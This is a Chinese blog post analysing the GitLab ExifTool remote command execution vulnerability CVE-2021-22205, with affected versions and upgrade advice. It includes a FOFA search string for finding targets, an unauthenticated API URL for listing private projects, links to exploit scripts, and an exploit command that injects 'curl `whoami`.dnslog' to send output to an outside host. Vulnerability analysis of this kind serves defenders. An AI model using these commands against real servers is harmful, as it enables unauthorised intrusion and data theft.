Gitlab 远程命令执行漏洞(CVE-2021-22205)分析

最新推荐文章于 2024-08-03 07:21:58 发布
最新推荐文章于 2024-08-03 07:21:58 发布
阅读量5.2k 收藏 3
点赞数
分类专栏: web安全 文章标签: 安全 github
原文链接:https://blog.csdn.net/ML_Team/article/details/121031234
版权

0x01 前言

GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用。

0x02 漏洞分析

未授权的端口在于用户注册:https://xx.xx.xx.xx/users/sign_up

 

还可以滥用Gitlab API接口列出所有项目(包括私有项目)

https://xx.xx.xx.xx/api/v4/projects/?simple=yes&private=true&per_page=1000&page=1

此漏洞是通过上传功能来实现RCE的,漏洞出于ExifTool功能处,用于从图像中移除元数据的开源工具,因为此工具在解析上传图像中的元数据时,并没有完全解析某些元数据,导致攻击者上传带有恶意元数据的图片,从而导致远程命令执行。

0x03 影响版本


  
  
  1. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      11.9 <= Gitlab CE/EE < 
      
      13.8
      
      .8
     
     
    
    
    
  2. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
     
     
     
    
    
    
  3. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      13.9 <= Gitlab CE/EE < 
      
      13.9
      
      .6
     
     
    
    
    
  4. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
     
     
     
    
    
    
  5. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      13.10 <= Gitlab CE/EE < 
      
      13.10
      
      .3

0x04 漏洞检测


  
  
  1. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      FOFA指纹:
     
     
    
    
    
  2. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
     
     
     
    
    
    
  3. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      title=
      
      "GitLab"

漏洞检测脚本:

https://github.com/RedTeamWing/CVE-2021-22205icon-default.png?t=L9C2https://github.com/RedTeamWing/CVE-2021-22205

pocsuite3项目地址:

GitHub - knownsec/pocsuite3: pocsuite3 is an open-sourced remote vulnerability testing framework developed by the Knownsec 404 Team.icon-default.png?t=L9C2https://github.com/knownsec/pocsuite3

备注:下载CVE-2021-22205.py脚本后,将CVE-2021-22205.py脚本放置pocsuite3项目的pocsuite3-master\pocsuite3\pocs目录下

 

执行以下命令:

python3 cli.py -r pocs/CVE-2021-22205.py -u ip:port --verify

EXP:https://github.com/r0eXpeR/CVE-2021-22205

执行以下命令:

python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

 

 

0x06 修复建议

  1. 升级至最新版本,官方下载链接:https://about.gitlab.com/update/

红云谈安全
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
漏洞预警:gitlab命令执行CVE-2021-22205
热门推荐
weixin_43526443的博客
12-06 6万+
——D&X安全实验室 目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 (1)使用vulhub搭建环境。 2)利用脚本 3)查看回显 Part5 修复建议 Part1 漏洞描述 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。 由于 GitLab 没有正确验证传递给文件解析器的图像文件...
CVE-2021-22205 GitLab 未授权RCE复现
weixin_46137328的博客
11-25 6272
0x00 漏洞简介GitLab是一款Ruby开发的Git项目管理平台。如11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-22204的影响,攻...
Gitlab exiftool远程命令执行漏洞CVE-2021-22205)复现
m0_74216884的博客
06-06 180
记录一次渗透过程中利用CVE-2021-22205漏洞
CVE-2021-22205——Gitlab 远程命令执行漏洞复现
LiBai'S BLOG
11-10 8755
CVE-2021-22205Vuln Impact影响版本环境Fofa语法漏洞利用脚本反弹ShellEXP Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a .
GitLab 安全漏洞 CVE-2021-22205 如何解决?
GitLab 中国发行版
04-16 618
GitLab 安全漏洞 CVE-2021-22205 解决方案。
GitLab 远程命令执行漏洞复现(CVE-2021-22205)
Bird&Bird
12-02 4393
目录一、漏洞描述二、影响版本三、环境搭建四、漏洞复现4.1、脚本复现4.1.1、下载利用脚本 一、漏洞描述 GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行,可执行系统命令。这是一个严重的问题。它现在在最新版本中得到缓解,漏洞编号CVE-2021-22205。 二、影响版本 11.9 <= GitLab(CE/EE)< 13.8.8 13.9 <= GitLab(CE/EE)< 13.9.6 13.10 <= GitLab(CE/EE)< 13
GitLab 预身份验证远程命令执行CVE-2021-22205
m0_65354386的博客
07-06 365
检查目标是否存在漏洞:python CVE-2021-22205.py -v true -t http://192.168.150.144:8080。漏洞环境使用vulhub搭建,漏洞目录为 vulhub/gitlab/CVE-2021-22205/下载工具并放入攻击机:https://github.com/Al1ex/CVE-2021-22205。环境启动后,访问http://IP:8080即可查看到GitLab的登录页面。回到靶机进入容器可以看到touch /tmp/success已成功执行
Gitlab 远程命令执行RCE漏洞CVE-2021-22205附exp
god_Zeo的安全博客
10-31 5966
0x01 漏洞介绍&原理 GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,是一款Ruby开发的Git项目管理平台。由于在11.9以后的GitLab中,使用了图片处理工具ExifTool,而此图片处理工具又受到了漏洞CVE-2021-22204的影响: 漏洞触发ExifTool功能处,ExifTool是用于从图像中移除元数据的开源工具,在解析上传图像中的元数据时,并没有完全解析某些元数据,导致攻击者上传带有恶意元数据的图片,从而导致远程命令执行。 攻击者可以通过一个存在
GitLab 远程命令执行漏洞(CVE-2021-22205)
weixin_42299610的博客
06-02 1298
GitLab 远程命令执行漏洞(CVE-2021-22205)
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
然而,2021 年底,Log4j 发现了一个严重的安全漏洞,被称为 CVE-2021-44228(也称为 Log4Shell),这使得攻击者可以通过在日志记录中注入恶意代码来远程执行任意代码,从而对受影响的系统造成严重威胁。 此漏洞源于...
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
首先,我们需要理解什么是远程命令执行漏洞。RCE漏洞允许攻击者通过网络在目标系统上执行任意命令,通常是因为程序处理用户输入时存在不安全的代码实践。在Spring4Shell漏洞中,问题出在Spring MVC和Spring WebFlux...
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1742
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
读零信任网络:在不可信网络中构建安全系统07设备信任
最新发布
lyingSeven的博客
08-03 451
设备安全
GitHub推出全新AI模型平台:简化开发者体验
2301_79342058的博客
08-03 844
在新的互动模型playground中,学生、爱好者、初创公司等可以只需几次点击和击键,就能探索来自Meta、Mistral、Azure OpenAI服务、微软等最受欢迎的私有和开放模型。现在,借助GitHub Models,超过1亿开发者可以在他们已经管理源代码、问题、拉取请求、工作流程和存储库的地方访问和实验新的AI模型——直接在GitHub上。从通过开源协作创建AI,到利用AI的力量创建软件,再到通过GitHub Models推动AI工程师的崛起——GitHub是AI时代的创作者网络。
CVE-2021-22205
08-09
CVE-2021-22205是一个与GitLab CE/EE相关的漏洞。根据引用和引用的信息,可以使用python脚本CVE-2021-22205.py来进行批量检测和利用该漏洞。通过运行命令"python3 CVE-2021-22205.py -s true -f target.txt"可以检测目标机器是否存在该漏洞,而通过命令"python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c command"可以利用该漏洞执行命令。引用提供了一个反弹shell的示例操作,通过执行一系列命令来实现反向连接并获取shell访问。请注意,此漏洞可能会导致安全风险,请在合法授权的情况下使用该工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值